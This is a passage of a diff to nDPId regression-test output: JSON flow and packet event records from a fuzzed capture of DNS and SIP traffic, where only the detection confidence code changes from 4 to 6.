00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":3,"flow_last_seen":1120470071297,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470071297,"pkt":"ADBUADREAODtAW69CABFAABIan4AAIAR7NPAqAECwKgBAQq+ADUANBBXP8gBqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470066293,"flow_last_seen":1120470071297,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470071297,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":244,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470075303,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.vo_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25202,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":243,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470066293,"flow_last_seen":1120470071297,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470071297,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.voip.brujula.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00910{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":244,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470066293,"flow_last_seen":1120470075303,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470075303,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2750,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.vo_s","num_queries":0,"num_answers":0,"reply_code":0,"query_type":25202,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1120470083305,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470083305,"pkt":"ADBUADRWAODtAW69CABFAABEaoAAAIARTNXAqAESwKgBAQq\/ADUAMAo2GsoAAAABAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":245,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083305,"flow_last_seen":1120470083305,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470083305,"l3_proto":"ip4","src_ip":"192.168.1.18","dst_ip":"192.168.1.1","src_port":2751,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1120470083306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470083306,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARt8vAqAEBwKgBAgA1Cr8AR+yxGsqAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAARoMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":246,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083306,"flow_last_seen":1120470083306,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120470083306,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2751,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1120470083310,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470083310,"pkt":"ADBUADRWAODtAW69CABFAABIaoIAAIARTM\/AqAECwKgBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":248,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470083310,"flow_last_seen":1120470083310,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470083310,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":250,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1120470084306,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470084306,"pkt":"ADBUADRWAODtAW69CABFAABIaoQAAIARTM3AqAECwKgBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00950{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1120470084827,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"thread_ts_msec":1120470084827,"pkt":"ADBUADRWAODtAW69CABFAAGTaoUAAIARzJTAqAECyEQlcxDEE8QBf5mcQ0FOQ0VMIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNDk4NDA1My00NGNlNGE0MTE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiAiYXJpayIgPHNpcDo4MTY2ajZAdm9pcC5icnVyanVsYS5uZXQ+O3RhZz02NDMzZWY5DQpUbzogPHNpcDo5NzIzOTI4NzA0NEB2b2lwLmhydWp1bGEubmX0Pg0KQ2FsbC1JRDogMTA1MDkwMjU5LTQ0NmZhZjdhQDE5Mi4xNjguMS4yDQpDU2VhOiAxIENBTkNFTA0KQ29udGVudC1MZW5ndGg6IDANCk1heC1Gb3J3YXJkczogNzANClVzZXItQWdFbnQ6IE5lJXMAU0lQUFMgSVAgUGhvbmUgVmVyc2lvbiAyLjAuNTEuMTYNCg0K"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":251,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470084827,"flow_last_seen":1120470084827,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470084827,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.37.115","src_port":4292,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00916{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1120470085969,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":389,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":389,"pkt_l4_len":273,"thread_ts_msec":1120470085969,"pkt":"ADBUADRWAODtAW69CABFAAElcwAAAIARzK\/AqAECyER4URMlcwABY9CsQUNLIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANCkZyb206ICJhcmlrIiA8c2lwOjgxNjY2NkB2U2lwLmJydXJqdYVhLm5ldD47dGFnPTY0MzNlZjkNCkNhbGwtSUQ6IDEwNTA5MDI1OS00NDZmYWY3YUAxOTIuMTY4LjEuMg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjo1MDYwO2JyYW5jaD16OWhHNGJLbnAxMDQ5ODQwNTMtNJ9jZTRhNDExOXkuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":253,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470085969,"flow_last_seen":1120470085969,"flow_idle_time":200000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":265,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":265,"midstream":0,"thread_ts_msec":1120470085969,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","src_port":4901,"dst_port":29440,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1120470086308,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470086308,"pkt":"ADBUADRmAODtAW69CABFAABIaocAAIARTMrAqAECZqgBAQrAADUANLk4cMwBAAABAACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} -00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00873{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":254,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470086308,"flow_last_seen":1120470086308,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470086308,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"102.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":0,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":256,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":3,"flow_last_seen":1120470088311,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470088311,"pkt":"ADBUADRWAODtAW69CABFAABIaokAAIARTMjAqAECwKgBAQrAADUANLk4cMwhAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1120470092317,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470092317,"pkt":"ADBUADRWAODtAW69CABFAABIaosAAIARTMbAYgECGagBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":200000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"thread_ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 